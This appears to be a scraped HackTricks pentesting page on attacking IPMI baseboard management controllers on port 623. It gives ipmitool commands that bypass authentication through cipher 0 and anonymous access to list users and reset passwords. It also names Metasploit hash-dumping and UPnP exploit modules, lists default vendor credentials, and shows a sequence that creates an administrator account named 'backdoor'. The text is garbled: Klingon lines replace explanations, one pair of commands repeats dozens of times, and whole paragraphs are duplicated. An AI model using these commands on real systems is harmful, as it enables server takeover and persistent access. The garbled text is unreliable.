hacktricks/network-services-pentesting/623-udp-ipmi.md

623/UDP/TCP - IPMI

623/UDP/TCP - IPMI

htARTE (HackTricks AWS Red Team Expert) ! 'ej Learn AWS hacking from zero to hero with

Other ways to support HackTricks:

• 'ej Download HackTricks in PDF Check the SUBSCRIPTION PLANS or see your company advertised in HackTricks!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Overview of IPMI

Intelligent Platform Management Interface (IPMI) offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially useful for:

• Pre-OS boot configurations
• Power-off management
• Recovery from system failures

IPMI is capable of monitoring temperatures, voltages, fan speeds, and power supplies, alongside providing inventory information, reviewing hardware logs, and sending alerts via SNMP. Essential for its operation are a power source and a LAN connection.

Since its introduction by Intel in 1998, IPMI has been supported by numerous vendors, enhancing remote management capabilities, especially with version 2.0's support for serial over LAN. Key components include:

• Baseboard Management Controller (BMC): The main micro-controller for IPMI operations.
• Communication Buses and Interfaces: For internal and external communication, including ICMB, IPMB, and various interfaces for local and network connections.
• IPMI Memory: For storing logs and data.

Default Port: 623/UDP/TCP (It's usually on UDP but it could also be running on TCP)

Enumeration

Discovery

nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use  auxiliary/scanner/ipmi/ipmi_version

jIyajbe' version ghItlh identify 'e' DIvI' vaj:

nmap -p 623 --script ipmi-version <target>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> mc info

or

ipmitool -I lanplus -H <target> -U <username> -P <password> lan print

or

ipmitool -I lanplus -H <target> -U <username> -P <password> chassis status

or

ipmitool -I lanplus -H <target> -U <username> -P <password> power status

or

ipmitool -I lanplus -H <target> -U <username> -P <password> sel list

or

ipmitool -I lanplus -H <target> -U <username> -P <password> sdr list

or

ipmitool -I lanplus -H <target> -U <username> -P <password> fru list

or

ipmitool -I lanplus -H <target> -U <username> -P <password> sensor list

or

ipmitool -I lanplus -H <target> -U <username> -P <password> event list

or

ipmitool -I lanplus -H <target> -U <username> -P <password> user list

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel info <channel_number>

or

ipmitool -I lanplus -H <target> -U <username> -P <password> channel getaccess <channel_number>

or

use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10

IPMI Vulnerabilities

In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through cipher type 0. This vulnerability, documented in detail at Dan Farmer's research, enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations.

IPMI Authentication Bypass via Cipher 0

To detect this flaw, the following Metasploit auxiliary scanner can be employed:

use auxiliary/scanner/ipmi/ipmi_cipher_zero

Translation:

Exploitation of this flaw is achievable with ipmitool, as demonstrated below, allowing for the listing and modification of user passwords:

Translation (Klingon):

Qapla'! jImej 'Ipmitool' vItlhutlhlaH, 'ejwI' lo'laHbe' 'ej lo'laHbe' ghaHvaD 'e' yIDel. 'ejwI' lo'laHbe' 'ej lo'laHbe' ghaHvaD 'e' yIDel.

apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval vulnerebility enables retrieval of salted hashed passwords (MD5 and SHA1) for any existing username. To test this vulnerebility, Metasploit offers a module:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

IPMI Anonymous Authentication

IPMI Anonymous Authentication (IPMI jIbogh)

Many BMCs have a default configuration that allows "anonymous" access, which is identified by empty username and password strings. This configuration can be exploited to reset passwords of named user accounts using ipmitool:

(ipmitool lo'wI' 'e' yIlo'lu')

ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword

Supermicro IPMI Clear-text Passwords

Supermicro IPMI Clear-text Passwords

A critical design choice in IPMI 2.0 necessitates the storage of clear-text passwords within BMCs for authentication purposes. Supermicro's storage of these passwords in locations such as /nv/PSBlock or /nv/PSStore raises significant security concerns:

Supermicro IPMI Clear-text Passwords

A critical design choice in IPMI 2.0 necessitates the storage of clear-text passwords within BMCs for authentication purposes. Supermicro's storage of these passwords in locations such as /nv/PSBlock or /nv/PSStore raises significant security concerns:

cat /nv/PSBlock

Supermicro IPMI UPnP Vulnerability

Supermicro's inclusion of a UPnP SSDP listener in its IPMI firmware, particularly on UDP port 1900, introduces a severe security risk. Vulnerabilities in the Intel SDK for UPnP Devices version 1.3.1, as detailed by Rapid7's disclosure, allow for root access to the BMC:

Supermicro IPMI UPnP Vulnerability

Supermicro's inclusion of a UPnP SSDP listener in its IPMI firmware, particularly on UDP port 1900, introduces a severe security risk. Vulnerabilities in the Intel SDK for UPnP Devices version 1.3.1, as detailed by Rapid7's disclosure, allow for root access to the BMC:

msf> use exploit/multi/upnp/libupnp_ssdp_overflow

Brute Force

HP Integrated Lights Out (iLO) (iLO) product default password randomizes during manufacture. Other manufacturers static default credentials. Default usernames and passwords for various products:

• HP Integrated Lights Out (iLO) default password is a factory randomized 8-character string, providing higher security.
• Dell's iDRAC, IBM's IMM, and Fujitsu's Integrated Remote Management Controller use easily guessable passwords like "calvin", "PASSW0RD" (with a zero), and "admin" respectively.
• Supermicro IPMI (2.0), Oracle/Sun ILOM, and ASUS iKVM BMC also use simple default credentials, with "ADMIN", "changeme", and "admin" as their passwords.

Accessing the Host via BMC

Administrative access to the Baseboard Management Controller (BMC) provides pathways to access the host's operating system. Exploiting the BMC's Keyboard, Video, Mouse (KVM) functionality allows for direct manipulation of the host's disk, including backdoor insertion, data extraction, or security assessment actions. This can be done by rebooting the host to a root shell via GRUB (using init=/bin/sh) or booting from a virtual CD-ROM set as a rescue disk. However, rebooting the host is a significant drawback. Accessing the running host without rebooting is more complex and varies with the host's configuration. If the host's physical or serial console remains logged in, it can be taken over through the BMC's KVM or serial-over-LAN (sol) functionalities via ipmitool. Exploring the exploitation of shared hardware resources, like the i2c bus and Super I/O chip, requires further investigation.

Introducing Backdoors into BMC from the Host

After compromising a host with a BMC, the local BMC interface can be used to insert a backdoor user account, creating a lasting presence on the server. This attack requires ipmitool on the compromised host and the activation of BMC driver support. The following commands show how to inject a new user account into the BMC using the host's local interface, bypassing the need for authentication. This technique is applicable to various operating systems, including Linux, Windows, BSD, and even DOS.

ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR

Shodan

• port:623

References

• https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/

htARTE (HackTricks AWS Red Team Expert) !HackTricks!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.